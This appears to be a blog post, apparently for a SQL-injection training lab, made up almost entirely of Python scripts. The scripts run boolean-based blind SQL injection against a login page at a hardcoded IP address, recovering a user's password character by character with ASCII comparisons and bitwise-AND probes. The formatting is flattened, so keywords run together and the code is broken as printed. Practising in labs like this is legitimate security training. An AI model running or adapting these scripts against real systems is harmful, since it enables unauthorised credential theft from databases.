deftraversing(char): chars="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!'#$%&()*+,-./:;<=>?@[]^_{|}~" for i in chars: if i==char: print(i) return traversing('t')
import requests import time from functools import wraps
defspend_time(func): @wraps(func) defwrapper(*agrs,**kwargs): startTime=time.time() func(*agrs,**kwargs) endTime=time.time() sumTime=endTime-startTime print("spend time:",sumTime) return wrapper @spend_time deftraversing(): url="http://111.230.11.183:44444/basic_skills/sql/sql3.php" chars="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!'#$%&()*+,-./:;<=>?@[]^_{|}~" flag_payload= "a' or 1 and ascii(substr((select password from user limit 0,1),{0},1))={1} -- " info="" for i in range(33): for char in chars: payload=flag_payload.format(i,ord(char)) data={ "username": payload, "password":"ye1s" } rep=requests.post(url=url,data=data,allow_redirects=False) if rep.status_code==302: info=info+char print(info) if __name__=="__main__": traversing()
import requests import time from functools import wraps
defspend_time(func): @wraps(func) defwrapper(*agrs,**kwargs): startTime=time.time() func(*agrs,**kwargs) endTime=time.time() sumTime=endTime-startTime print("spend time:",sumTime) return wrapper @spend_time defand_operation(): url="http://111.230.11.183:44444/basic_skills/sql/sql3.php" flag_payload= "a' or 1 and ascii(substr((select password from user limit 0,1),{0},1))&{1} -- " info="" for j in range(1,33): value=0 for k in range(7): payload=flag_payload.format(j,2**k) data={ "username": payload, "password":"ye1s" } rep=requests.post(url=url,data=data,allow_redirects=False) if rep.status_code==302: value=value+(2**k) if value==0: break info=info+chr(value) print(info) if __name__=="__main__": and_operation()
评论